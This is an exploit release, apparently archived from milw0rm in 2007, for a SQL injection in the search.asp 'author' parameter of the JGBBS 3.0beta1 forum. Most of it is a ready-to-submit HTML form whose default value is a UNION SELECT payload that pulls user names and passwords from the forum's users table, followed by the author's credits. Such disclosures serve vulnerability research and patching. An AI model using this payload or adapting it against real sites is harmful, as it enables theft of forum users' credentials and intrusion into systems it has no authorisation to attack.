JGBBS 3.0beta1 (search.asp author) SQL Injection Exploit<!--

JGBBS 3.0beta1 Version Search.ASP `Author` SQL Injection Exploit

Type :

SQL Injection

Release Date :

{2007-03-13}

Product / Vendor :

JGBBS Is a Tree-style Online Forum System

http://sourceforge.net/projects/jgbbs/

Bug :

http://localhost/script/search.asp?author=-SQL Inj.-&amp;bid=0

SQL Injection Exploit :

-->

JGBBS 3.0beta1 Version Search.ASP `Author` SQL Injection Exploit
<body bgcolor=`#000000`>
<form name=`searchFrm` method=`get` action=`http://localhost/script/search.asp`>
<table width=`500` border=`0` align=`center`>
<font face=`Verdana` size=`2` color=`#FF0000`><b>JGBBS 3.0beta1 Version Search.ASP `Author` SQL Injection Exploit</b></font>
<br>
  <tr>
    <td align=`right`><font face=`Arial` size=`1` color=`#00FF00`>SQL Injection Code</td>
    <td>&amp;nbsp;</td>
    <td><input name=`author` type=`text` value=`UniquE-Key'UNION SELECT 0,1,user_password,3,4,5,user_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 FROM users` class=`inputbox` style=`color: #000000` style=`width:300px; `></td>
  </tr>
  <tr>
    <td align=`right`><font face=`Arial` size=`1` color=`#00FF00`>Search Board</td>
    <td>&amp;nbsp;</td>
    <td>
      <select name=`bid`>
        <option value=`0`>(ALL)</option>
      </select>&amp;nbsp;
      <input type=`submit` value=`Apply`>
    </td>
  </tr>
</table>
</form>
<center><font face=`Verdana` size=`2` color=`#FF0000`><b>UniquE-Key{UniquE-Cracker}</b></font>
<br>
<font face=`Verdana` size=`2` color=`#FF0000`><b>UniquE@UniquE-Key.ORG</b></font>
<br>
<font face=`Verdana` size=`2` color=`#FF0000`><b>http://UniquE-Key.ORG</b></font></center>

<!--
Tested :

JGBBS 3.0beta1

Vulnerable :

JGBBS 3.0beta1

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org
-->

# milw0rm.com [2007-03-13]
